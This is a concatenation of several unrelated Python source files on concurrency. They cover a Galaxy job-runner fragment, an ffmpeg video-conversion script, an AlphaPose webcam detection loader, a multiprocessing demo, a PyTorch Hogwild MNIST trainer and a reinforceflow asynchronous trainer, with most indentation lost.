self.job_name = ''.join( map( lambda x: x if x in ( string.letters + string.digits + '_' ) else '_', job_name ) )
def cleanup( self ):
for file in [ getattr( self, a ) for a in self.cleanup_file_attributes if hasattr( self, a ) ]:
try:
os.unlink( file )
except Exception, e:
log.debug( "(%s/%s) Unable to cleanup %s: %s" % ( self.job_wrapper.get_id_tag(), self.job_id, file, str( e ) ) )
def register_cleanup_file_attribute( self, attribute ):
if attribute not in self.cleanup_file_attributes:
self.cleanup_file_attributes.append( attribute )
class AsynchronousJobRunner( BaseJobRunner ):
"""Parent class for any job runner that runs jobs asynchronously (e.g. via
a distributed resource manager). Provides general methods for having a
thread to monitor the state of asynchronous jobs and submitting those jobs
    to the correct methods (queue, finish, cleanup) at appropriate times.
"""
def __init__( self, app, nworkers ):
super( AsynchronousJobRunner, self ).__init__( app, nworkers )
# 'watched' and 'queue' are both used to keep track of jobs to watch.
# 'queue' is used to add new watched jobs, and can be called from
# any thread (usually by the 'queue_job' method). 'watched' must only
# be modified by the monitor thread, which will move items from 'queue'
# to 'watched' and then manage the watched jobs.
self.watched = []
self.monitor_queue = Queue()
def _init_monitor_thread(self):
self.monitor_thread = threading.Thread( name="%s.monitor_thread" % self.runner_name, target=self.monitor )
self.monitor_thread.setDaemon( True )
self.monitor_thread.start()
def handle_stop(self):
# DRMAA and SGE runners should override this and disconnect.
pass
def monitor( self ):
"""
Watches jobs currently in the monitor queue and deals with state
changes (queued to running) and job completion.
"""
while 1:
# Take any new watched jobs and put them on the monitor list
try:
while 1:
async_job_state = self.monitor_queue.get_nowait()
if async_job_state is STOP_SIGNAL:
# TODO: This is where any cleanup would occur
self.handle_stop()
return
self.watched.append( async_job_state )
except Empty:
pass
# Iterate over the list of watched jobs and check state
try:
self.check_watched_items()
except Exception, e:
log.exception('Unhandled exception checking active jobs')
# Sleep a bit before the next state check
time.sleep( 1 )
def monitor_job(self, job_state):
self.monitor_queue.put( job_state )
def shutdown( self ):
"""Attempts to gracefully shut down the monitor thread"""
log.info( "%s: Sending stop signal to monitor thread" % self.runner_name )
self.monitor_queue.put( STOP_SIGNAL )
# Call the parent's shutdown method to stop workers
super( AsynchronousJobRunner, self ).shutdown()
def check_watched_items(self):
"""
This method is responsible for iterating over self.watched and handling
state changes and updating self.watched with a new list of watched job
states. Subclasses can opt to override this directly (as older job runners will
initially) or just override check_watched_item and allow the list processing to
reuse the logic here.
"""
new_watched = []
for async_job_state in self.watched:
new_async_job_state = self.check_watched_item(async_job_state)
if new_async_job_state:
new_watched.append(new_async_job_state)
self.watched = new_watched
# Subclasses should implement this unless they override check_watched_items all together.
    def check_watched_item(self, job_state):
raise NotImplementedError()
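    # Added sketch (hedged, not part of the original API): a typical override polls
    # the resource manager and either keeps or drops the job state, e.g.
    #
    #     def check_watched_item(self, job_state):
    #         status = self._poll_drm(job_state.job_id)    # hypothetical helper
    #         if status == 'finished':
    #             self.mark_as_finished(job_state)          # hand off to a worker thread
    #             return None                               # drop from the watch list
    #         return job_state                              # keep watching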
def finish_job( self, job_state ):
"""
Get the output/error for a finished job, pass to `job_wrapper.finish`
and cleanup all the job's temporary files.
"""
galaxy_id_tag = job_state.job_wrapper.get_id_tag()
external_job_id = job_state.job_id
# To ensure that files below are readable, ownership must be reclaimed first
job_state.job_wrapper.reclaim_ownership()
# wait for the files to appear
which_try = 0
while which_try < (self.app.config.retry_job_output_collection + 1):
try:
stdout = shrink_stream_by_size( file( job_state.output_file, "r" ), DATABASE_MAX_STRING_SIZE, join_by="\n..\n", left_larger=True, beginning_on_size_error=True )
stderr = shrink_stream_by_size( file( job_state.error_file, "r" ), DATABASE_MAX_STRING_SIZE, join_by="\n..\n", left_larger=True, beginning_on_size_error=True )
which_try = (self.app.config.retry_job_output_collection + 1)
except Exception, e:
if which_try == self.app.config.retry_job_output_collection:
stdout = ''
stderr = 'Job output not returned from cluster'
log.error( '(%s/%s) %s: %s' % ( galaxy_id_tag, external_job_id, stderr, str( e ) ) )
else:
time.sleep(1)
which_try += 1
try:
# This should be an 8-bit exit code, but read ahead anyway:
exit_code_str = file( job_state.exit_code_file, "r" ).read(32)
except:
# By default, the exit code is 0, which typically indicates success.
exit_code_str = "0"
try:
# Decode the exit code. If it's bogus, then just use 0.
exit_code = int(exit_code_str)
except:
log.warning( "(%s/%s) Exit code '%s' invalid. Using 0." % ( galaxy_id_tag, external_job_id, exit_code_str ) )
exit_code = 0
# clean up the job files
if self.app.config.cleanup_job == "always" or ( not stderr and self.app.config.cleanup_job == "onsuccess" ):
job_state.cleanup()
try:
job_state.job_wrapper.finish( stdout, stderr, exit_code )
except:
log.exception( "(%s/%s) Job wrapper finish method failed" % ( galaxy_id_tag, external_job_id ) )
job_state.job_wrapper.fail( "Unable to finish job", exception=True )
def fail_job( self, job_state ):
if getattr( job_state, 'stop_job', True ):
self.stop_job( self.sa_session.query( self.app.model.Job ).get( job_state.job_wrapper.job_id ) )
job_state.job_wrapper.fail( getattr( job_state, 'fail_message', 'Job failed' ) )
if self.app.config.cleanup_job == "always":
job_state.cleanup()
def mark_as_finished(self, job_state):
self.work_queue.put( ( self.finish_job, job_state ) )
def mark_as_failed(self, job_state):
self.work_queue.put( ( self.fail_job, job_state ) )
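# --- Illustrative sketch (not part of Galaxy) ----------------------------------
# The methods above implement a monitor-queue pattern: watched jobs arrive on a
# queue, get collected into a list, and are polled until a stop sentinel shows up.
# The stripped-down function below restates that loop on its own, using only names
# already available in this module (Empty, time); the sentinel object and the
# check_item callback are hypothetical stand-ins, not Galaxy API.
_SKETCH_STOP = object()

def _monitor_loop_sketch(monitor_queue, check_item, poll_interval=1):
    """Drain the queue, poll watched items, and exit when the sentinel arrives."""
    watched = []
    while True:
        try:
            while True:
                item = monitor_queue.get_nowait()
                if item is _SKETCH_STOP:
                    return
                watched.append(item)
        except Empty:
            pass
        # keep only the items whose check callback reports them as still active
        watched = [item for item in watched if check_item(item)]
        time.sleep(poll_interval)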
|
main.py
|
#!/usr/bin/env python
import os
import subprocess
import threading
import time
import queue
index=0
idx=0
filepath='/Users/joe/Desktop/videos'
outpath='/Users/joe/Desktop/BU_19_Spring/EC500/output-video'
def file_input(filepath):
files = os.listdir(filepath)
q=queue.Queue()
for file in files:
q.put(file)
return q
def ffmpeg_convert_720p(filepath):
q=file_input(filepath)
global index
while not q.empty():
video = q.get()
video_720p = "ffmpeg -i "+filepath+"/"+video+" -s hd720 -b:v 2M -r 30 "+outpath+"/"+video[:-4]+"720.mp4"
subprocess.call(video_720p,shell=True)
        print('video', index, 'has been converted to 720p')
index=index+1
time.sleep(1)
print('All videos converted to 720p!')
def ffmpeg_convert_480p(filepath):
global idx
q=file_input(filepath)
while not q.empty():
video = q.get()
video_480p = "ffmpeg -i "+filepath+"/"+video+" -s hd480 -b:v 1M -r 30 "+outpath+"/"+video[:-4]+"480.mp4"
subprocess.call(video_480p,shell=True)
        print('video', idx, 'has been converted to 480p')
idx=idx+1
time.sleep(1)
print('All videos converted to 480p!')
def main():
    start = time.perf_counter()
    t1 = threading.Thread(target=ffmpeg_convert_720p, args=(filepath,))
    t2 = threading.Thread(target=ffmpeg_convert_480p, args=(filepath,))
    t1.start()
    t2.start()
    # wait for both conversion threads to finish before measuring elapsed time
    t1.join()
    t2.join()
    consume = time.perf_counter() - start
    print("Time used:", consume)
if __name__=="__main__":
main()
|
dataloader_webcam.py
|
import os
import torch
from torch.autograd import Variable
import torch.utils.data as data
import torchvision.transforms as transforms
from PIL import Image, ImageDraw
from SPPE.src.utils.img import load_image, cropBox, im_to_torch
from opt import opt
from yolo.preprocess import prep_image, prep_frame, inp_to_image
from pPose_nms import pose_nms, write_json
from SPPE.src.utils.eval import getPrediction
from yolo.util import write_results, dynamic_write_results
from yolo.darknet import Darknet
from tqdm import tqdm
import cv2
import json
import numpy as np
import sys
import time
import torch.multiprocessing as mp
from multiprocessing import Process
from multiprocessing import Queue as pQueue
from threading import Thread
# import the Queue class from Python 3
if sys.version_info >= (3, 0):
from queue import Queue, LifoQueue
# otherwise, import the Queue class for Python 2.7
else:
from Queue import Queue, LifoQueue
if opt.vis_fast:
from fn import vis_frame_fast as vis_frame
else:
from fn import vis_frame
class WebcamLoader:
def __init__(self, webcam, batchSize=1, queueSize=256):
# initialize the file video stream along with the boolean
# used to indicate if the thread should be stopped or not
self.stream = cv2.VideoCapture(int(webcam))
assert self.stream.isOpened(), 'Cannot capture source'
self.stopped = False
# initialize the queue used to store frames read from
# the video file
self.batchSize = batchSize
self.Q = LifoQueue(maxsize=queueSize)
def start(self):
# start a thread to read frames from the file video stream
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
# keep looping infinitely
i = 0
while True:
# otherwise, ensure the queue has room in it
if not self.Q.full():
img = []
orig_img = []
im_name = []
im_dim_list = []
for k in range(self.batchSize):
(grabbed, frame) = self.stream.read()
# if the `grabbed` boolean is `False`, then we have
# reached the end of the video file
if not grabbed:
self.stop()
return
inp_dim = int(opt.inp_dim)
img_k, orig_img_k, im_dim_list_k = prep_frame(
frame, inp_dim)
img.append(img_k)
orig_img.append(orig_img_k)
im_name.append(str(i) + '.jpg')
im_dim_list.append(im_dim_list_k)
with torch.no_grad():
# Human Detection
img = torch.cat(img)
im_dim_list = torch.FloatTensor(im_dim_list).repeat(1, 2)
self.Q.put((img, orig_img, im_name, im_dim_list))
i = i + 1
else:
with self.Q.mutex:
self.Q.queue.clear()
def videoinfo(self):
# indicate the video info
fourcc = int(self.stream.get(cv2.CAP_PROP_FOURCC))
fps = self.stream.get(cv2.CAP_PROP_FPS)
frameSize = (int(self.stream.get(cv2.CAP_PROP_FRAME_WIDTH)),
int(self.stream.get(cv2.CAP_PROP_FRAME_HEIGHT)))
return (fourcc, fps, frameSize)
def getitem(self):
# return next frame in the queue
return self.Q.get()
def len(self):
# return queue size
return self.Q.qsize()
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
class DetectionLoader:
def __init__(self, dataloder, batchSize=1, queueSize=1024):
# initialize the file video stream along with the boolean
# used to indicate if the thread should be stopped or not
self.det_model = Darknet("yolo/cfg/yolov3-spp.cfg")
self.det_model.load_weights('models/yolo/yolov3-spp.weights')
self.det_model.net_info['height'] = opt.inp_dim
self.det_inp_dim = int(self.det_model.net_info['height'])
assert self.det_inp_dim % 32 == 0
assert self.det_inp_dim > 32
self.det_model.cuda()
self.det_model.eval()
self.stopped = False
self.dataloder = dataloder
self.batchSize = batchSize
# initialize the queue used to store frames read from
# the video file
self.Q = LifoQueue(maxsize=queueSize)
def start(self):
# start a thread to read frames from the file video stream
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
# keep looping the whole dataset
while True:
img, orig_img, im_name, im_dim_list = self.dataloder.getitem()
with self.dataloder.Q.mutex:
self.dataloder.Q.queue.clear()
with torch.no_grad():
# Human Detection
img = img.cuda()
prediction = self.det_model(img, CUDA=True)
# NMS process
dets = dynamic_write_results(prediction,
opt.confidence,
opt.num_classes,
nms=True,
nms_conf=opt.nms_thesh)
if isinstance(dets, int) or dets.shape[0] == 0:
for k in range(len(orig_img)):
if self.Q.full():
time.sleep(2)
self.Q.put((orig_img[k], im_name[k], None, None, None,
None, None))
continue
dets = dets.cpu()
im_dim_list = torch.index_select(im_dim_list, 0,
dets[:, 0].long())
scaling_factor = torch.min(self.det_inp_dim / im_dim_list,
1)[0].view(-1, 1)
# coordinate transfer
dets[:, [1, 3]] -= (self.det_inp_dim - scaling_factor *
im_dim_list[:, 0].view(-1, 1)) / 2
dets[:, [2, 4]] -= (self.det_inp_dim - scaling_factor *
im_dim_list[:, 1].view(-1, 1)) / 2
dets[:, 1:5] /= scaling_factor
for j in range(dets.shape[0]):
dets[j, [1, 3]] = torch.clamp(dets[j, [1, 3]], 0.0,
im_dim_list[j, 0])
dets[j, [2, 4]] = torch.clamp(dets[j, [2, 4]], 0.0,
im_dim_list[j, 1])
boxes = dets[:, 1:5]
scores = dets[:, 5:6]
for k in range(len(orig_img)):
boxes_k = boxes[dets[:, 0] == k]
if isinstance(boxes_k, int) or boxes_k.shape[0] == 0:
if self.Q.full():
time.sleep(2)
self.Q.put((orig_img[k], im_name[k], None, None, None,
None, None))
continue
inps = torch.zeros(boxes_k.size(0), 3, opt.inputResH,
opt.inputResW)
pt1 = torch.zeros(boxes_k.size(0), 2)
pt2 = torch.zeros(boxes_k.size(0), 2)
if self.Q.full():
time.sleep(2)
self.Q.put((orig_img[k], im_name[k], boxes_k,
scores[dets[:, 0] == k], inps, pt1, pt2))
def read(self):
# return next frame in the queue
return self.Q.get()
def len(self):
# return queue len
return self.Q.qsize()
class DetectionProcessor:
def __init__(self, detectionLoader, queueSize=1024):
# initialize the file video stream along with the boolean
# used to indicate if the thread should be stopped or not
self.detectionLoader = detectionLoader
self.stopped = False
# initialize the queue used to store data
self.Q = LifoQueue(maxsize=queueSize)
def start(self):
# start a thread to read frames from the file video stream
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
# keep looping the whole dataset
while True:
with torch.no_grad():
(orig_img, im_name, boxes, scores, inps, pt1,
pt2) = self.detectionLoader.read()
with self.detectionLoader.Q.mutex:
self.detectionLoader.Q.queue.clear()
if boxes is None or boxes.nelement() == 0:
while self.Q.full():
time.sleep(0.2)
self.Q.put(
(None, orig_img, im_name, boxes, scores, None, None))
continue
inp = im_to_torch(cv2.cvtColor(orig_img, cv2.COLOR_BGR2RGB))
inps, pt1, pt2 = crop_from_dets(inp, boxes, inps, pt1, pt2)
while self.Q.full():
time.sleep(0.2)
self.Q.put((inps, orig_img, im_name, boxes, scores, pt1, pt2))
def read(self):
# return next frame in the queue
return self.Q.get()
def len(self):
# return queue len
return self.Q.qsize()
class WebcamDetectionLoader:
def __init__(self, webcam=0, batchSize=1, queueSize=256):
# initialize the file video stream along with the boolean
# used to indicate if the thread should be stopped or not
self.det_model = Darknet("yolo/cfg/yolov3-spp.cfg")
self.det_model.load_weights('models/yolo/yolov3-spp.weights')
self.det_model.net_info['height'] = opt.inp_dim
self.det_inp_dim = int(self.det_model.net_info['height'])
assert self.det_inp_dim % 32 == 0
assert self.det_inp_dim > 32
self.det_model.cuda()
self.det_model.eval()
self.stream = cv2.VideoCapture(int(webcam))
assert self.stream.isOpened(), 'Cannot open webcam'
self.stopped = False
self.batchSize = batchSize
# initialize the queue used to store frames read from
# the video file
self.Q = LifoQueue(maxsize=queueSize)
def len(self):
return self.Q.qsize()
def start(self):
# start a thread to read frames from the file video stream
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
# keep looping
while True:
img = []
inp = []
orig_img = []
im_name = []
im_dim_list = []
for k in range(self.batchSize):
(grabbed, frame) = self.stream.read()
if not grabbed:
continue
# process and add the frame to the queue
inp_dim = int(opt.inp_dim)
img_k, orig_img_k, im_dim_list_k = prep_frame(frame, inp_dim)
inp_k = im_to_torch(orig_img_k)
img.append(img_k)
inp.append(inp_k)
orig_img.append(orig_img_k)
im_dim_list.append(im_dim_list_k)
with torch.no_grad():
ht = inp[0].size(1)
wd = inp[0].size(2)
# Human Detection
img = Variable(torch.cat(img)).cuda()
im_dim_list = torch.FloatTensor(im_dim_list).repeat(1, 2)
im_dim_list = im_dim_list.cuda()
prediction = self.det_model(img, CUDA=True)
# NMS process
dets = dynamic_write_results(prediction,
opt.confidence,
opt.num_classes,
nms=True,
nms_conf=opt.nms_thesh)
if isinstance(dets, int) or dets.shape[0] == 0:
for k in range(len(inp)):
if self.Q.full():
with self.Q.mutex:
self.Q.queue.clear()
self.Q.put((inp[k], orig_img[k], None, None))
continue
im_dim_list = torch.index_select(im_dim_list, 0,
dets[:, 0].long())
scaling_factor = torch.min(self.det_inp_dim / im_dim_list,
1)[0].view(-1, 1)
# coordinate transfer
dets[:, [1, 3]] -= (self.det_inp_dim - scaling_factor *
im_dim_list[:, 0].view(-1, 1)) / 2
dets[:, [2, 4]] -= (self.det_inp_dim - scaling_factor *
im_dim_list[:, 1].view(-1, 1)) / 2
dets[:, 1:5] /= scaling_factor
for j in range(dets.shape[0]):
dets[j, [1, 3]] = torch.clamp(dets[j, [1, 3]], 0.0,
im_dim_list[j, 0])
dets[j, [2, 4]] = torch.clamp(dets[j, [2, 4]], 0.0,
im_dim_list[j, 1])
boxes = dets[:, 1:5].cpu()
scores = dets[:, 5:6].cpu()
for k in range(len(inp)):
if self.Q.full():
with self.Q.mutex:
self.Q.queue.clear()
self.Q.put((inp[k], orig_img[k], boxes[dets[:, 0] == k],
scores[dets[:, 0] == k]))
def videoinfo(self):
# indicate the video info
fourcc = int(self.stream.get(cv2.CAP_PROP_FOURCC))
fps = self.stream.get(cv2.CAP_PROP_FPS)
frameSize = (int(self.stream.get(cv2.CAP_PROP_FRAME_WIDTH)),
int(self.stream.get(cv2.CAP_PROP_FRAME_HEIGHT)))
return (fourcc, fps, frameSize)
def read(self):
# return next frame in the queue
return self.Q.get()
def more(self):
# return True if there are still frames in the queue
return self.Q.qsize() > 0
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
class DataWriter:
def __init__(self,
save_video=False,
savepath='examples/res/1.avi',
fourcc=cv2.VideoWriter_fourcc(*'XVID'),
fps=25,
frameSize=(640, 480),
queueSize=1024):
if save_video:
# initialize the file video stream along with the boolean
# used to indicate if the thread should be stopped or not
self.stream = cv2.VideoWriter(savepath, fourcc, fps, frameSize)
assert self.stream.isOpened(), 'Cannot open video for writing'
self.save_video = save_video
self.stopped = False
self.final_result = []
# initialize the queue used to store frames read from
# the video file
self.Q = Queue(maxsize=queueSize)
if opt.save_img:
if not os.path.exists(opt.outputpath + '/vis'):
os.mkdir(opt.outputpath + '/vis')
def start(self):
# start a thread to read frames from the file video stream
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
# keep looping infinitely
while True:
# if the thread indicator variable is set, stop the
# thread
if self.stopped:
if self.save_video:
self.stream.release()
return
# otherwise, ensure the queue is not empty
if not self.Q.empty():
(boxes, scores, hm_data, pt1, pt2, orig_img,
im_name) = self.Q.get()
orig_img = np.array(orig_img, dtype=np.uint8)
if boxes is None:
if opt.save_img or opt.save_video or opt.vis:
img = orig_img
if opt.vis:
cv2.imshow("AlphaPose Demo", img)
cv2.waitKey(30)
if opt.save_img:
cv2.imwrite(
os.path.join(opt.outputpath, 'vis', im_name),
img)
if opt.save_video:
self.stream.write(img)
else:
# location prediction (n, kp, 2) | score prediction (n, kp, 1)
preds_hm, preds_img, preds_scores = getPrediction(
hm_data, pt1, pt2, opt.inputResH, opt.inputResW,
opt.outputResH, opt.outputResW)
result = pose_nms(boxes, scores, preds_img, preds_scores)
result = {'imgname': im_name, 'result': result}
self.final_result.append(result)
if opt.save_img or opt.save_video or opt.vis:
img = vis_frame(orig_img, result)
if opt.vis:
cv2.imshow("AlphaPose Demo", img)
cv2.waitKey(30)
if opt.save_img:
cv2.imwrite(
os.path.join(opt.outputpath, 'vis', im_name),
img)
if opt.save_video:
self.stream.write(img)
else:
time.sleep(0.1)
def running(self):
# indicate that the thread is still running
time.sleep(0.2)
return not self.Q.empty()
def save(self, boxes, scores, hm_data, pt1, pt2, orig_img, im_name):
# save next frame in the queue
self.Q.put((boxes, scores, hm_data, pt1, pt2, orig_img, im_name))
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
time.sleep(0.2)
def results(self):
# return final result
return self.final_result
def len(self):
# return queue len
return self.Q.qsize()
class Mscoco(data.Dataset):
def __init__(self,
train=True,
sigma=1,
scale_factor=(0.2, 0.3),
rot_factor=40,
label_type='Gaussian'):
self.img_folder = '../data/coco/images' # root image folders
self.is_train = train # training set or test set
self.inputResH = opt.inputResH
self.inputResW = opt.inputResW
self.outputResH = opt.outputResH
self.outputResW = opt.outputResW
self.sigma = sigma
self.scale_factor = scale_factor
self.rot_factor = rot_factor
self.label_type = label_type
self.nJoints_coco = 17
self.nJoints_mpii = 16
self.nJoints = 33
self.accIdxs = (1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16,
17)
self.flipRef = ((2, 3), (4, 5), (6, 7), (8, 9), (10, 11), (12, 13),
(14, 15), (16, 17))
def __getitem__(self, index):
pass
def __len__(self):
pass
def crop_from_dets(img, boxes, inps, pt1, pt2):
    '''
    Crop detected humans from the original image according to the detection results.
    '''
imght = img.size(1)
imgwidth = img.size(2)
tmp_img = img
tmp_img[0].add_(-0.406)
tmp_img[1].add_(-0.457)
tmp_img[2].add_(-0.480)
for i, box in enumerate(boxes):
upLeft = torch.Tensor((float(box[0]), float(box[1])))
bottomRight = torch.Tensor((float(box[2]), float(box[3])))
ht = bottomRight[1] - upLeft[1]
width = bottomRight[0] - upLeft[0]
if width > 100:
scaleRate = 0.2
else:
scaleRate = 0.3
upLeft[0] = max(0, upLeft[0] - width * scaleRate / 2)
upLeft[1] = max(0, upLeft[1] - ht * scaleRate / 2)
bottomRight[0] = max(
min(imgwidth - 1, bottomRight[0] + width * scaleRate / 2),
upLeft[0] + 5)
bottomRight[1] = max(
min(imght - 1, bottomRight[1] + ht * scaleRate / 2), upLeft[1] + 5)
inps[i] = cropBox(tmp_img.clone(), upLeft, bottomRight, opt.inputResH,
opt.inputResW)
pt1[i] = upLeft
pt2[i] = bottomRight
return inps, pt1, pt2
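# --- Usage sketch (not part of the original module) -------------------------------
# The classes above form a producer/consumer pipeline: WebcamLoader feeds frames,
# DetectionLoader runs the YOLO detector, DetectionProcessor crops the detected
# people, and DataWriter visualizes/saves the results. A rough wiring is sketched
# below; `pose_model` is a placeholder for whatever SPPE pose network the demo
# script actually loads, so this is an illustration rather than the real demo code.
def _run_webcam_pipeline_sketch(pose_model, webcam=0):
    data_loader = WebcamLoader(webcam).start()
    det_loader = DetectionLoader(data_loader, batchSize=1).start()
    det_processor = DetectionProcessor(det_loader).start()
    writer = DataWriter(save_video=False).start()
    while True:
        with torch.no_grad():
            (inps, orig_img, im_name, boxes, scores, pt1, pt2) = det_processor.read()
            if boxes is None or boxes.nelement() == 0:
                writer.save(None, None, None, None, None, orig_img, im_name)
                continue
            hm_data = pose_model(inps.cuda()).cpu()  # heatmaps from the placeholder pose model
            writer.save(boxes, scores, hm_data, pt1, pt2, orig_img, im_name)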
|
multipro02.py
|
from multiprocessing import Process
import os
def info(title):
print(title)
print('module name:', __name__)
print('parent process:', os.getppid())
print('process id:', os.getpid())
def f(name):
    info('\nSecond\n')
print('\nBye', name)
if __name__ == '__main__':
    info('\nFirst\n')
p = Process(target=f, args=('Gabriel',))
p.start()
p.join()
|
main.py
|
from __future__ import print_function
import argparse
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.multiprocessing as mp
from train import train, test
# Training settings
parser = argparse.ArgumentParser(description='PyTorch MNIST Example')
parser.add_argument('--batch-size', type=int, default=128, metavar='N',
                    help='input batch size for training (default: 128)')
parser.add_argument('--test-batch-size', type=int, default=1000, metavar='N',
help='input batch size for testing (default: 1000)')
parser.add_argument('--epochs', type=int, default=10, metavar='N',
help='number of epochs to train (default: 10)')
parser.add_argument('--lr', type=float, default=0.01, metavar='LR',
help='learning rate (default: 0.01)')
parser.add_argument('--momentum', type=float, default=0.5, metavar='M',
help='SGD momentum (default: 0.5)')
parser.add_argument('--seed', type=int, default=1, metavar='S',
help='random seed (default: 1)')
parser.add_argument('--log-interval', type=int, default=10, metavar='N',
help='how many batches to wait before logging training status')
parser.add_argument('--num-processes', type=int, default=8, metavar='N',
                    help='how many training processes to use (default: 8)')
parser.add_argument('--cuda', action='store_true', default=True,
help='enables CUDA training')
parser.add_argument('--model', default='./mnist.dat')
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(1, 10, kernel_size=5)
self.conv2 = nn.Conv2d(10, 20, kernel_size=5)
self.conv2_drop = nn.Dropout2d()
self.fc1 = nn.Linear(320, 50)
self.fc2 = nn.Linear(50, 10)
def forward(self, x):
x = F.relu(F.max_pool2d(self.conv1(x), 2))
x = F.relu(F.max_pool2d(self.conv2_drop(self.conv2(x)), 2))
x = x.view(-1, 320)
x = F.relu(self.fc1(x))
x = F.dropout(x, training=self.training)
x = self.fc2(x)
return F.log_softmax(x, dim=1)
if __name__ == '__main__':
args = parser.parse_args()
use_cuda = args.cuda and torch.cuda.is_available()
device = torch.device("cuda" if use_cuda else "cpu")
print("Current Device:", device)
dataloader_kwargs = {'pin_memory': True} if use_cuda else {}
torch.manual_seed(args.seed)
mp.set_start_method('spawn')
model = Net().to(device)
model.share_memory() # gradients are allocated lazily, so they are not shared here
processes = []
for rank in range(args.num_processes):
p = mp.Process(target=train, args=(rank, args, model, device, dataloader_kwargs))
# We first train the model across `num_processes` processes
p.start()
processes.append(p)
for p in processes:
p.join()
torch.save(model.state_dict(), args.model)
# Once training is complete, we can test the model
# test(args, model, device, dataloader_kwargs)
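# --- Reference sketch (train.py is not included in this dump) ---------------------
# train() and test() above come from a separate train.py module. For orientation,
# a Hogwild-style worker matching the call signature used above typically looks
# roughly like the function below; the dataset path, transform, and loop details
# are assumptions, not the author's actual code.
def _train_sketch(rank, args, model, device, dataloader_kwargs):
    import torch.optim as optim
    from torch.utils.data import DataLoader
    from torchvision import datasets, transforms
    torch.manual_seed(args.seed + rank)
    loader = DataLoader(
        datasets.MNIST('./data', train=True, download=True,
                       transform=transforms.ToTensor()),
        batch_size=args.batch_size, shuffle=True, **dataloader_kwargs)
    optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum)
    model.train()
    for epoch in range(args.epochs):
        for data, target in loader:
            optimizer.zero_grad()
            loss = F.nll_loss(model(data.to(device)), target.to(device))
            loss.backward()
            optimizer.step()  # updates the shared (model.share_memory()) parameters in place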
|
async_trainer.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
from threading import Thread
import tensorflow as tf
from reinforceflow import logger
from reinforceflow.core import Stats
from reinforceflow.core.runner import EnvRunner
from reinforceflow.core.schedule import Schedule
from reinforceflow.core.stats import flush_stats
from reinforceflow.trainers.trainer import BaseTrainer
from reinforceflow.utils import tensor_utils
class AsyncTrainer(BaseTrainer):
def __init__(self, agent, thread_agents, maxsteps, batch_size,
logdir, logfreq, log_on_term=True, lr_schedule=None,
render=False, test_env=None, test_render=False,
test_episodes=1, test_maxsteps=5e5):
"""Creates trainer based on Experience Replay buffer.
Args:
agent:
maxsteps (int): Total amount of seen observations.
logdir (str): Path used for summary and checkpoints.
logfreq (int): Checkpoint and summary saving frequency (in seconds).
log_on_term (bool): Whether to log only after episode ends.
lr_schedule (core.Schedule): Learning rate scheduler.
render (bool): Enables game screen rendering.
test_env (gym.Env): Environment instance, used for testing.
test_render (bool): Enables rendering for test evaluations.
test_episodes (int): Number of test episodes. To disable test evaluation, pass 0.
test_maxsteps (int): Maximum step allowed during test per episode.
"""
self.agent = agent
self.maxsteps = maxsteps
self.batch_size = batch_size
self.logdir = logdir
self.logfreq = logfreq
self.log_on_term = log_on_term
self.render = render
self.test_env = test_env
self.test_render = test_render
self.test_episodes = test_episodes
self.test_maxsteps = test_maxsteps
self.lr_schedule = Schedule.create(lr_schedule, agent.opt.lr, maxsteps)
self._last_log_time = time.time()
self._last_target_sync = self.agent.step
self._summary_op = tf.summary.merge_all()
self.thread_agents = thread_agents
self.request_stop = False
self.sync_ops = []
self.thread_stats = []
for th_agent in thread_agents:
th_agent.sess = agent.sess
with tf.device(th_agent.device), tf.variable_scope(th_agent.name):
sync_op = [w.assign(self.agent.weights[i]) for i, w in enumerate(th_agent.weights)]
self.sync_ops.append(sync_op)
tensor_utils.initialize_variables(self.agent.sess)
for th_agent in thread_agents:
self.thread_stats.append(Stats(th_agent))
def train_thread(self, thread_agent, sync_op, stats):
runner = EnvRunner(agent=thread_agent, env=thread_agent.env, batch_size=self.batch_size,
sync_agent=self.agent)
while self.agent.step < self.maxsteps:
if self.request_stop:
return
self.agent.sess.run(sync_op)
obs, action, reward, term, obs_next, traj_ends, infos = runner.sample()
thread_agent.step = self.agent.step
thread_agent.episode = self.agent.episode
stats.add(action, reward, term, infos)
thread_agent.train_on_batch(obs=obs,
actions=action,
rewards=reward,
term=term,
obs_next=obs_next,
traj_ends=traj_ends,
lr=self.lr_schedule.value(self.agent.step),
summarize=False)
def train(self):
"""Starts training."""
writer = tf.summary.FileWriter(self.logdir, self.agent.sess.graph)
threads = []
for thread_agent, sync, stats in zip(self.thread_agents, self.sync_ops, self.thread_stats):
thread_agent.sess = self.agent.sess
t = Thread(target=self.train_thread, args=(thread_agent, sync, stats))
t.daemon = True
t.start()
threads.append(t)
self.request_stop = False
last_log_time = time.time()
try:
while self.agent.step < self.maxsteps:
if time.time() - last_log_time >= self.logfreq:
last_log_time = time.time()
flush_stats(self.thread_stats, name="%s Thread" % self.agent.name,
maxsteps=self.maxsteps, writer=writer)
self.agent.save_weights(self.logdir)
self.agent.test(self.test_env,
self.test_episodes,
max_steps=self.test_maxsteps,
render=self.test_render,
writer=writer)
writer.flush()
if self.render:
[agent.env.render() for agent in self.thread_agents]
time.sleep(0.01)
except KeyboardInterrupt:
logger.info('Caught Ctrl+C! Stopping training process.')
self.request_stop = True
logger.info('Saving progress & performing evaluation.')
self.agent.save_weights(self.logdir)
self.agent.test(self.test_env, self.test_episodes, render=self.test_render)
[t.join() for t in threads]
logger.info('Training finished!')
writer.close()
def save(self):
pass
def load(self):
pass
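# --- Note on weight syncing (illustrative only) -----------------------------------
# Each worker thread periodically copies the master agent's weights into its own
# variable copies via the assign ops built in __init__ (self.sync_ops). The helper
# below restates that one idea in isolation for plain TF1 variable lists; it is a
# sketch, not part of the reinforceflow API.
def _build_sync_op_sketch(master_vars, worker_vars):
    """Return a grouped op that copies every master variable into its worker copy."""
    return tf.group(*[w.assign(m) for w, m in zip(worker_vars, master_vars)])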
|
